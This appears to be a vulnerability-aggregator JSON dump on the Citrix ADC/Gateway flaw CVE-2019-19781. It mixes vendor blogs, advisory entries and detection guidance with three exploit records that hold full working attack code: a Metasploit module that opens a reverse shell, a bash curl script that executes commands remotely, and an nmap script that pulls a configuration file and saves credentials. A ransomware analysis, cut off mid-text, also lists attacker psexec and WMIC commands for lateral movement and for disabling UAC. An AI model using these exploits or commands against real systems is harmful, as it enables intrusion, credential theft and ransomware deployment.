response from the server, from which they can identify known webshells, and block the subsequent requests thereafter.\n\nYou can read more about Imperva\u2019s backdoor protection [here](<https://www.imperva.com/blog/the-trickster-hackers-backdoor-obfuscation-and-evasion-techniques/>)\n\n**Webshells observed in the campaign**\n\nIn its disclosure, the ACSC provided a [list of webshells](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises-Web-Shell-Source.txt>) observed during the attack campaign. In each instance, the source code for the webshell was provided, XOR\u2019d, and base64 encoded to prevent \u2018accidental mishandling\u2019 of the code. We\u2019ll look briefly at two of these webshells and outline how Imperva\u2019s Backdoor Protection effectively mitigates them. Shown below is the Awen webshell source code in its encoded form.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image6.png>)\n\n### Awen asp.net webshell\n\nThis is a simple, open source asp.net webshell outlined by the ACSC in its disclosure. It creates a simple HTML form which receives a string as input, and provides it as an argument to cmdexe. Shown below is the Awen webshell running in our sandbox environment, after executing the \u201csysteminfo\u201d command.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image1-1.png>)\n\nAnalysts at Imperva were then able to decode the source code of both the webshells discussed, execute that code on a sandbox environment, and gather enough info to craft signatures to detect the webshells in the wild. Although neither of these webshells have been observed in the wild by Imperva at this time, we will be monitoring the traffic detected by these signatures closely in the coming weeks.\n\nFrom even a brief look at the details provided about the recent Australian Cyber attack, a lot can be learned about the techniques used by threat actors, and many conclusions can be drawn. Among the most significant is that even advanced \u201cstate based\u201d actors will make use of readily available exploits and attack code. Although the [mitigation recommendations from the ACSC](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-008-copy-paste-compromises-tactics-techniques-and-procedures-used-target-multiple-australian-networks>) are well advised, the use of a well configured WAF can serve as an extra layer of protection. This is where the deployment of the Imperva WAF could make all the difference to your business.\n\nThe post [Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF](<https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-06T15:01:00", "type": "impervablog", "title": "Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935", "CVE-2019-19781"], "modified": "2020-07-06T15:01:00", "id": "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "href": "https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2020-01-19T23:04:26", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2020-01-13T00:00:00", "type": "zdt", "title": "Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "1337DAY-ID-33806", "href": "https://0day.today/exploit/description/33806", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Citrix ADC Remote Code Execution',\r\n 'Description' => %q(\r\n An issue was discovered in Citrix Application Delivery Controller (ADC)\r\n and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\r\n ),\r\n 'Author' => [\r\n 'RAMELLA S\u00e9bastien' # https://www.pirates.re/\r\n ],\r\n 'References' => [\r\n ['CVE', '2019-19781'],\r\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\r\n ['EDB', '47901'],\r\n ['EDB', '47902']\r\n ],\r\n 'DisclosureDate' => '2019-12-17',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl meterpreter'\r\n }\r\n },\r\n 'Targets' => [\r\n ['Unix (remote shell)',\r\n 'Type' => :cmd_shell,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/reverse_perl',\r\n 'DisablePayloadHandler' => 'false'\r\n }\r\n ],\r\n ['Unix (command-line)',\r\n 'Type' => :cmd_generic,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/generic',\r\n 'DisablePayloadHandler' => 'true'\r\n }\r\n ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'Notes' => {\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\r\n }\r\n ))\r\n\r\n register_options([\r\n OptAddress.new('RHOST', [true, 'The target address'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false])\r\n ])\r\n\r\n deregister_options('RHOSTS')\r\n end\r\n\r\n def execute_command(command, opts = {})\r\n filename = Rex::Text.rand_text_alpha(16)\r\n nonce = Rex::Text.rand_text_alpha(6)\r\n\r\n request = {\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'),\r\n 'headers' => {\r\n 'NSC_USER' => '../../../netscaler/portal/templates/' + filename,\r\n 'NSC_NONCE' => nonce\r\n },\r\n 'vars_post' => {\r\n 'url' => 'http://127.0.0.1',\r\n 'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\",\r\n 'desc' => 'desc',\r\n 'UI_inuse' => 'RfWeb'\r\n },\r\n 'encode_params' => false\r\n }\r\n\r\n begin\r\n received = send_request_cgi(request)\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n return false unless received\r\n\r\n if received.code == 200\r\n vprint_status(\"#{received.get_html_document.text}\")\r\n sleep 2\r\n\r\n request = {\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'),\r\n 'headers' => {\r\n 'NSC_USER' => nonce,\r\n 'NSC_NONCE' => nonce\r\n }\r\n }\r\n\r\n ## Trigger to gain exploitation.\r\n begin\r\n send_request_cgi(request)\r\n received = send_request_cgi(request)\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n return false unless received\r\n return received\r\n end\r\n\r\n return false\r\n end\r\n\r\n def get_chr_payload(command)\r\n chr_payload = command\r\n i = chr_payload.length\r\n\r\n output = \"\"\r\n chr_payload.each_char do | c |\r\n i = i - 1\r\n output << \"chr(\" << c.ord.to_s << \")\"\r\n if i != 0\r\n output << \" . \"\r\n end\r\n end\r\n\r\n return output\r\n end\r\n\r\n def check\r\n begin\r\n received = send_request_cgi(\r\n \"method\" => \"GET\",\r\n \"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf')\r\n )\r\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\r\n print_error('Unable to connect on the remote target.')\r\n end\r\n\r\n if received && received.code != 200\r\n return Exploit::CheckCode::Safe\r\n end\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n unless check.eql? Exploit::CheckCode::Vulnerable\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\r\n end\r\n else\r\n print_good('The target appears to be vulnerable.')\r\n end\r\n\r\n case target['Type']\r\n when :cmd_generic\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n\r\n received = execute_command(payload.encoded)\r\n if (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\")\r\n print_warning('Dumping command output in parsed http response')\r\n print_good(\"#{received.get_html_document.text}\")\r\n else\r\n print_warning('Empty response, no command output')\r\n return\r\n end\r\n\r\n when :cmd_shell\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n\r\n execute_command(payload.encoded)\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2020-01-19] #", "sourceHref": "https://0day.today/exploit/33806", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-19T23:06:56", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2020-01-11T00:00:00", "type": "zdt", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution Vulnerability (1)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "1337DAY-ID-33794", "href": "https://0day.today/exploit/description/33794", "sourceData": "#!/bin/bash\r\n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781\r\n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'\r\n# Release Date : 11/01/2020\r\n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia\r\necho \"=================================================================================\r\n ___ _ _ ____ ___ _ _\r\n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _\r\n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' |\r\n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_|\r\n |__/ CVE-2019-19781\r\n=================================================================================\"\r\n##############################\r\nif [ -z \"$1\" ];\r\nthen\r\necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n'\r\nexit;\r\nfi\r\nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);\r\ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is\r\necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\r\necho -ne \"Command Output :\\n\"\r\ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\n\n# 0day.today [2020-01-19] #", "sourceHref": "https://0day.today/exploit/33794", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-19T23:02:20", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2020-01-16T00:00:00", "type": "zdt", "title": "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T00:00:00", "id": "1337DAY-ID-33824", "href": "https://0day.today/exploit/description/33824", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\r\n# CVE: CVE-2019-19781\r\n# Vulenrability: Path Traversal\r\n# Vulnerablity Discovery: Mikhail Klyuchnikov\r\n# Exploit Author: Dhiraj Mishra\r\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\r\n# Vendor Homepage: https://www.citrix.com/\r\n# References: https://support.citrix.com/article/CTX267027\r\n# https://github.com/nmap/nmap/pull/1893\r\n\r\nlocal http = require \"http\"\r\nlocal stdnse = require \"stdnse\"\r\nlocal shortport = require \"shortport\"\r\nlocal table = require \"table\"\r\nlocal string = require \"string\"\r\nlocal vulns = require \"vulns\"\r\nlocal nmap = require \"nmap\"\r\nlocal io = require \"io\"\r\n\r\ndescription = [[\r\nThis NSE script checks whether the traget server is vulnerable to\r\nCVE-2019-19781\r\n]]\r\n---\r\n-- @usage\r\n-- nmap --script https-citrix-path-traversal -p <port> <host>\r\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\r\noutput='file.txt'\r\n-- @output\r\n-- PORT STATE SERVICE\r\n-- 443/tcp open http\r\n-- | CVE-2019-19781:\r\n-- | Host is vulnerable to CVE-2019-19781\r\n-- @changelog\r\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\r\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\r\n-- @xmloutput\r\n-- <table key=\"NMAP-1\">\r\n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem>\r\n-- <elem key=\"state\">VULNERABLE</elem>\r\n-- <table key=\"description\">\r\n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,\r\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\r\n-- traversal vulnerability that allows attackers to read configurations or\r\nany other file.\r\n-- </table>\r\n-- <table key=\"dates\">\r\n-- <table key=\"disclosure\">\r\n-- <elem key=\"year\">2019</elem>\r\n-- <elem key=\"day\">17</elem>\r\n-- <elem key=\"month\">12</elem>\r\n-- </table>\r\n-- </table>\r\n-- <elem key=\"disclosure\">17-12-2019</elem>\r\n-- <table key=\"extra_info\">\r\n-- </table>\r\n-- <table key=\"refs\">\r\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\r\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\r\n-- </table>\r\n-- </table>\r\n\r\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\r\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\r\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\r\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\r\n\r\nportrule = shortport.ssl\r\n\r\naction = function(host,port)\r\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\r\n local vuln = {\r\n title = 'Citrix ADC Path Traversal',\r\n state = vulns.STATE.NOT_VULN,\r\n description = [[\r\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\r\n12.1, and 13.0 are vulnerable\r\nto a unauthenticated path traversal vulnerability that allows attackers to\r\nread configurations or any other file.\r\n ]],\r\n references = {\r\n 'https://support.citrix.com/article/CTX267027',\r\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\r\n },\r\n dates = {\r\n disclosure = {year = '2019', month = '12', day = '17'},\r\n },\r\n }\r\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\r\n local path = \"/vpn/../vpns/cfg/smb.conf\"\r\n local response\r\n local output = {}\r\n local success = \"Host is vulnerable to CVE-2019-19781\"\r\n local fail = \"Host is not vulnerable\"\r\n local match = \"[global]\"\r\n local credentials\r\n local citrixADC\r\n response = http.get(host, port.number, path)\r\n\r\n if not response.status then\r\n stdnse.print_debug(\"Request Failed\")\r\n return\r\n end\r\n if response.status == 200 then\r\n if string.match(response.body, match) then\r\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\r\nSCRIPT_NAME,host.targetname or host.ip, path)\r\n vuln.state = vulns.STATE.VULN\r\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\r\nor host.ip,port.number, path))\r\n if outputFile then\r\n credentials = response.body:gsub('%W','.')\r\nvuln.check_results = stdnse.format_output(true, citrixADC)\r\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being\r\nstored in the output file\")\r\nfile = io.open(outputFile, \"a\")\r\nfile:write(credentials, \"\\n\")\r\n else\r\n vuln.check_results = stdnse.format_output(true, citrixADC)\r\n end\r\n end\r\n elseif response.status == 403 then\r\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\r\nor host.ip, path, response.status)\r\n vuln.state = vulns.STATE.NOT_VULN\r\n end\r\n\r\n return vuln_report:make_output(vuln)\r\nend\n\n# 0day.today [2020-01-19] #", "sourceHref": "https://0day.today/exploit/33824", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:31", "description": "\n\nArt Manion and Will Dormann report:\n\n\n\t By using an older and less-secure form of open(), it is\n\t possible for untrusted template files to cause reads/writes\n\t outside of the template directories. This vulnerability is\n\t a component of the recent Citrix exploit.\n\t \n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-13T00:00:00", "type": "freebsd", "title": "Template::Toolkit -- Directory traversal on write", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2019-12-13T00:00:00", "id": "2BAB995F-36D4-11EA-9DAD-002590ACAE31", "href": "https://vuxml.freebsd.org/freebsd/2bab995f-36d4-11ea-9dad-002590acae31.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Issue in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 allowing Directory Traversal.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Citrix Application Delivery Controller and Citrix Gateway Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-19781", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2020-01-20T12:15:15", "description": "**Update January 17, 2020**: A new detection in Qualys Web Application Scanning was added. See \"Detecting with Qualys WAS\" below.\n\nCitrix released a [security advisory](<https://support.citrix.com/article/CTX267027>) ([CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)) for a remote code execution vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway products. The vulnerability allows an unauthenticated remote attacker to execute arbitrary code on the system. Once exploited, remote attackers could obtain access to private network resources without requiring authentication.\n\nDuring the week of January 13, [attacks on Citrix appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) have [intensified](<https://www.zdnet.com/article/a-hacker-is-patching-citrix-servers-to-maintain-exclusive-access/>). Because of the active attacks and the ease of exploitation, organizations are advised to pay close attention.\n\n### About CVE-2019-19781\n\nThe vulnerability affects all supported versions of Citrix ADC and Citrix Gateway products. As Citrix did not disclose many details about the vulnerability, the [mitigation steps](<https://support.citrix.com/article/CTX267679>) suggest the VPN handler fails to sufficiently sanitize user-supplied inputs. The exploit attempt would include HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL. The responder policy rule checks for string \u201c/vpns/\" and if user is connected to the SSLVPN, and sends a 403 response as seen below.\n\n_add responder policy ctx267027 \"HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/vpns/\\\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/../\\\"))\" respondwith403 _\n\n### Detecting with Qualys VM\n\nQualys has issued QID 372305 for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that includes authenticated and remote detections of vulnerabilities present in affected Citrix products. This QID is included in signature version VULNSIGS-2.4.788-2.\n\n_QID 372305 : Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)_\n\nThe QID contains a remote and an authenticated signature to check the presence of vulnerability in Citrix Products. \nYou can search for this new QID in AssetView or within the VM Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid:372305_ \n_vulnerabilities.vulnerability.cveId:`CVE-2019-19781`_\n\nThis will return a list of all impacted hosts.\n\nYou can also create a Dashboard to track all Citrix vulnerabilities as shown in the template below:\n\n\n\n \n\n### Detecting with Qualys Threat Protection\n\nThe fastest way to locate vulnerable hosts is though the [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) Live Feed as seen here:\n\n\n\nSimply click on the Impacted Assets number to see a list of hosts with this vulnerability.\n\n### Detecting with Qualys WAS\n\nQualys has released QID 150273 in [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) (WAS) that includes a passive detection of vulnerabilities present in the affected Citrix products.\n\n_QID 150273 : Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)_\n\nThis detection is useful for customers using Qualys WAS in their environments, and it has the advantage of detecting both at the root level of the target being scanned **and** at the starting URL of the web application as specified in the WAS configuration.\n\nThe passive detection works by sending an HTTPS request and looking for evidence of the vulnerability in the response. If the scanned application is vulnerable, the QID will be reported in your Qualys WAS scan report.\n\n### Mitigation\n\nCustomers are recommended to apply Citrix\u2019s [Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>) as soon as possible.\n\nCustomers can check their systems for exploit attempts using \u201cgrep\u201d for requests that contain \u201cvpns\u201d and \u201c..\u201d.\n\nA patch is expected from Citrix by the end of January 2020, and organizations are advised to install that patch as soon as it is available.", "cvss3": {}, "published": "2020-01-09T00:12:26", "type": "qualysblog", "title": "Citrix ADC and Gateway Remote Code Execution Vulnerability (CVE-2019-19781)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-09T00:12:26", "id": "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2020/01/08/citrix-adc-and-gateway-remote-code-execution-vulnerability-cve-2019-19781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-14T06:32:34", "description": "Over the past year there has been a rise in extortion malware that focuses on stealing sensitive data and threatening to publish the data unless a ransom is paid. This technique bypasses some of the mitigations put in place, such as backups, which would allow IT organizations to recover data without having to pay such a ransom. One of the more popular ransomware families over the last few months to switch to this extortion tactic was Nefilim.\n\n### About Nefilim Ransomware\n\nNefilim ransomware emerged in March 2020 when Nemty operators quit the ransomware as a service model to concentrate their energy on more targeted attacks with more focused resources. The author of the Nemty ransomware also appears to have shared Nemty's source code with others. According to [Vitali Kremez and ID Ransomware's Michael Gillespie](<https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/>), the new Nefilim ransomware appears to be based on Nemty's code. Sharing many notable similarities with Nemty version 2.5, Nefilim has the capabilities to move laterally within networks.\n\nNefilim targets vulnerabilities such as [CVE-2019-11634](<https://threatpost.com/nefilim-ransomware-ghost-account/163341/>) and [CVE-2019-19781](<https://cyware.com/news/nefilim-gang-leveraged-citrix-gateway-exploit-6da5fa37>) in Citrix gateway devices, identified in December 2019 and patched in January 2020. The hackers target organizations using the unpatched or poorly secured Citrix remote-access technology, stealing data and then deploying ransomware.\n\nNefilim attackers exfiltrate sensitive data before encryption. When ransoms are not paid, they have been known to shame victims by posting their data on the dark web.\n\n### Technical Details\n\n#### Initial access\n\nNefilim ransomware is distributed through exposed Remote Desktop Protocol (RDP) setups by brute-forcing them and using other known vulnerabilities for initial access, i.e. vulnerabilities in Citrix gateway devices. Nefilim places a heavy emphasis on Remote Desktop Protocols.\n\nOnce an attacker gains a foothold on the victim system, the attacker drops and executes its components such as anti-antivirus, exfiltration tools, and finally Nefilim itself.\n\n#### Lateral Movement\n\nAmong the various tactics and techniques used by the attackers, they rely on tools such as PsExec to remotely execute commands in their victims\u2019 networks. It has been also seen that Nefilim uses other tools to gather credentials that include Mimikatz, LaZagne, and NirSoft\u2019s NetPass. It uses bat files to stop services/kill processes as shown in below image, and the stolen credentials are used to reach high-value machines like servers. The hackers work to move around the network before deploying their ransomware to find out where juicier data may be stored. They exfiltrate sensitive data before encryption.\n\nSome of the commands that execute by the attacker\n \n \n Start copy kill.bat \\destinationip\\c$\\windows\\temp\n \n \n Start psexec.exe \\destinationip -u domain\\username\\ -p password -d -h -r mstdc -s -accepteula -nobanner c:\\windows\\teamp\\Kill.bat\n \n \n Start psexec.exe -accepteula \\destinationip -u domain\\username\\ -p password reg add HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /F\n \n \n WMIC /node: \\destinationip /username:\u201ddomain\\username\u201d /password:\u201dpassword\u201d process CALL CREATE \u201ccmd.exe /c copy \\sourceip\\c$\\windows\\temp C:\\WINDOWS\\TEMP\\kill.bat\"\n \n \n WMIC /node: \\destinationip /username:\u201ddomain\\username\u201d /password:\u201dpassword\u201d process CALL CREATE \u201ccmd.exe /c C:\\WINDOWS\\TEMP\\kill.bat\"\n\nBelow images shows A batch file to stop services/kill processes\n\nFig. 1 Stopping Services Fig. 2 Killing Process\n\n#### Data exfiltration\n\nIt copies data from servers/shared directories to the local directory and compresses with dropped 7zip binary. It also drops and installs MegaSync to exfiltrate data.\n\n#### Ransomware Execution\n\nThe Nefilim malware uses AES-128 encryption to lock files and their blackmail payments are made via email. After encryption, it dropped the ransomware note by named \u2018NEFILIM-DECRYPT.txt\u2019. All files are encrypted with the extension of (.NEFILIM). It appends AES encrypted key at end of the encrypted file. This AES encryption key will then be encrypted by an RSA-2048 public key that is embedded in the ransomware executable. In addition to the encrypted AES key, the ransomware will also add the "NEFILIM" string as a file marker to all encrypted files.\n\nFig. 3 Crypto API\u2019s in Nefilim IOC\n\nIn the Below image malware create Mutex\n\nFig. 4 Creating Mutex\n\nSome of the Anti-debugging techniques: Ransomware uses anti-debugging method by calling the IsDebuggerPresent function. This function detects if the calling process is being debugged by a user-mode debugger. It also makes use of API GetTickCount / QueryPerformanceCounter to get the number of ticks since the last system reboot. It checks for a timestamp and compare it to another one after a few malicious instructions, in order to check if there was a delay.\n\nFig. 5 Anti debugging API Fig. 6 Anti debugging API\n\nShell execute: Nefilim delete itself from the target systems after infection with the help of ShellExecute API\n \n \n 